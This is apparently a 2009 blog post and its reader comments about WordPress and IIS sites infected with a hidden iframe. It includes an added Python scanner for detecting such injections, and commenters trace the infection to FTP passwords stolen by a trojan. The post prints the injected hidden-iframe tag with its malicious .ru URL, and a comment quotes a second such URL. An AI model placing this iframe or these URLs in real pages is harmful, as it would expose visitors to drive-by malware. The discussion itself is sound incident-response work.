http://a3l.ru:8080/ts/in.cgi?pepsi85
Yesterday we had a problem where this site was infected with two lines of code that loaded a hidden iframe from an external server:
<iframe width="125" height="125" style="visibility: hidden;" src="http://a3l.ru:8080/ts/in.cgi?pepsi85">
Other sites on the same server were also affected. WordPress sites like this one were hit particularly hard: they stopped serving pages and threw errors instead.
Deleting the iframe from the affected files solved the problem.
July 2nd, 2009 in Security
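The two symptoms described in the post and in Ayolt's comment below (a CSS-hidden iframe pointing at another host, written right after the BODY tag or at the end of index.*/default.* files that changed in the last few days) can be checked for with a small scanner. This is an added example, not code from the post or the commenters; the seven-day window, the site_host parameter and the SAMPLE page are assumptions.

```python
import os
import re
import time

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:["'“”]([^"'“”>]*)["'“”]|([^\s>]+))""")  # straight or curly quotes
BODY_RE = re.compile(r"<body\b[^>]*>", re.IGNORECASE)


def is_target_filename(name: str) -> bool:
    return name.lower().split(".")[0] in ("index", "default")  # only index.*/default.* were rewritten


def find_hidden_iframes(html: str, site_host: str) -> list:
    """Report each CSS-hidden off-site iframe and whether it sits right after <body> or at file end."""
    body = BODY_RE.search(html)
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): q or bare for k, q, bare in ATTR_RE.findall(m.group(0))}
        style = re.sub(r"\s+", "", attrs.get("style", "").lower())
        src = attrs.get("src", "")
        host = re.sub(r"^(https?:)?//", "", src).split("/")[0].split(":")[0].lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        if hidden and host and host != site_host.lower():  # relative or same-site src is not suspicious
            after_body = (body is not None and m.start() >= body.end()
                          and html[body.end():m.start()].strip() == "")
            tail = re.sub(r"</iframe>", "", html[m.end():], flags=re.IGNORECASE).strip()
            findings.append({"src": src, "host": host, "after_body": after_body, "at_end": tail == ""})
    return findings


def scan_tree(root: str, site_host: str, max_age_days: int = 7) -> list:
    """Walk a web root, checking only index.*/default.* files changed in the last few days."""
    cutoff = time.time() - max_age_days * 86400
    hits = []
    for dirpath, _, names in os.walk(root):
        for path in (os.path.join(dirpath, n) for n in names if is_target_filename(n)):
            if os.path.getmtime(path) >= cutoff:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    hits += [dict(f, path=path) for f in find_hidden_iframes(fh.read(), site_host)]
    return hits


# Constructed sample (not from the post): a hidden off-site iframe right after <body>, then a legitimate one.
SAMPLE = ("<html><head><title>Home</title></head>\n<body>\n"
          '<iframe width="125" height="125" style="visibility: hidden;" '
          'src="http://injected.example.invalid/ts/in.cgi?x"></iframe>\n<p>Welcome</p>\n'
          '<iframe width="400" height="300" src="http://www.example.com/video"></iframe>\n'
          "</body></html>\n")
```

Running `find_hidden_iframes(SAMPLE, "www.example.com")` flags only the hidden iframe and records that it sits directly after the BODY tag; `scan_tree("/path/to/webroot", "www.example.com")` applies the same check to recently changed index/default files.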
Hi,
Today I noticed the same code is appearing at the bottom of my wordpress powered site too. I re-uploaded all the wordpress files, including my theme. But the iframe is still there. And I really can’t find anything wrong in a file.
My site: http://www.startgrid.be (there’s a space between the bottom of the content and the bottom of the browser window which isn’t supposed to be there.)
You say you deleted the affected files, can you tell me which files those were in your case?
Thanks,
Vincent
I believe it is all ‘index’ and ‘default’ pages affected. Look for ALL of these pages on your site. So if any files are called index and default re-upload them.
Dear Vincent, we’re having the same at this moment. Since Friday, 4 of our servers have been attacked. The content of the page that is called in the iframe appears to contain a virus, so be careful!
In our case, I could just search in Windows for all files named ‘index.’ and ‘default.’ that had been changed in the past few days. In there, I found that they append the iframe code right after the BODY tag or at the end of the file if there is no body tag.
I have been trying to find what is the vulnerability that lets them in. Do you have any idea? We had the problem on a Windows 2000 machine with IIS and ColdFusion 5.0, MS SQL Server 7. But we also had it on a newer machine with Windows 2003 x64 with IIS and ColdFusion 7MX and SQL Server 2005.
Did you find anything so far? Please let me know what type of machine you’re using.
Best regards and thanks,
Ayolt
I had the same problem yesterday with some sites. The easy solution is to delete the iframe lines, but the pages can be infected again. Does anyone know how to close the backdoor?
thanks
I was told that it was probably the FTP which had been compromised and that all passwords should be changed. This fits as the sites with different FTP passwords were not affected.
Also, it is NOT a brute force attack as FTP logs show they got the password right first time. Probably a good idea to scan for trojan horses on your own machine.
Hi,
We just had 20 sites edited with http://x9y.ru:8080/ts/in.cgi?pepsi120 within 5 minutes, and on 8 different servers. We tracked it down to an infected laptop in the office and it used CuteFTP. We removed the laptop and fixed all the sites and changed the password on 19 sites, left one test site with the same password, plugged the laptop back in and within 2 mins of opening CuteFTP the site was edited with the code.
The good news was we found the problem; the bad news was it spread to other computers on the network.
I found a Trojan on my work laptop which I believe was responsible as well. You need to clean the machine(s) you have the FTP passwords saved on before changing the passwords.